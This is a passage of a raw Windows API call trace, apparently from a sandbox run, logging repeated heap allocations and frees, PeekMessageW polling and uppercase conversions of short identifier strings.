hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0086.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0086.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0086.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0086.843] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0086.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0086.843] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0086.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0086.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0086.843] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0086.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0086.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c28 [0086.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74358 [0086.843] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0086.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0086.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0086.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0086.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0086.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0086.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0086.843] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0086.843] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0086.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0086.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0086.843] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0086.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0086.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e9c0 [0086.844] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0086.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0086.844] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0086.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0086.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0086.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0086.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0086.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0086.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0086.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0086.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0086.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0086.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0086.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0086.844] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0086.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0086.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0086.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0086.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0086.844] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0086.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0086.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a00 [0086.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0086.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a30 [0086.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bb0 [0086.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a48 [0086.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0086.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0086.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0086.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0086.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a78 [0086.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0086.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ad8 [0086.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a748f8 [0086.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0086.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9bf8 [0086.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b08 [0086.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9cb8 [0086.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0086.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9e68 [0086.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9e20 [0086.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0086.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0086.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.845] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0086.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.845] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c70 | out: hHeap=0x2af0000) returned 1 [0086.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0086.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0086.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0086.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0086.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.846] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0086.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9eb0 | out: hHeap=0x2af0000) returned 1 [0086.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c58 | out: hHeap=0x2af0000) returned 1 [0086.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0086.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0086.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0086.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0086.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0086.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0086.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0086.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0086.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0086.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0086.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0086.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0086.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0086.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0086.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e20 | out: hHeap=0x2af0000) returned 1 [0086.846] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a748f8 | out: hHeap=0x2af0000) returned 1 [0086.847] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0086.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74358 | out: hHeap=0x2af0000) returned 1 [0086.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0086.847] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0086.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0086.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0086.847] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0086.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77dc8 | out: hHeap=0x2af0000) returned 1 [0086.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a30 [0086.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73c50 [0086.847] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0086.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b38 [0086.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0086.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0086.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0086.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0086.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0086.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0086.847] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0086.847] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0086.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0086.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0086.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0086.847] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0086.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0086.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0086.848] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0086.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0086.848] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0086.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0086.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0086.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0086.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0086.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0086.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0086.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a48 | out: hHeap=0x2af0000) returned 1 [0086.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0086.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0086.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73c50 | out: hHeap=0x2af0000) returned 1 [0086.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0086.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7200 [0086.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0086.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0086.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0086.848] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0086.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0086.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0086.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ac0 | out: hHeap=0x2af0000) returned 1 [0086.848] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0086.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7200 | out: hHeap=0x2af0000) returned 1 [0086.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0086.849] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0086.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0086.849] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0086.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0086.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.849] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0086.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0086.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0086.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0086.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0086.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0086.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0086.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0086.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0086.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0086.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0086.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0086.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0086.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0086.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0086.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0086.849] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0086.849] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0086.849] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0086.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0086.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0086.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0086.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0086.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0086.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0086.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0086.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0086.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0086.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bf8 | out: hHeap=0x2af0000) returned 1 [0086.850] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0086.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0086.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0086.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0086.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0086.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0086.850] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 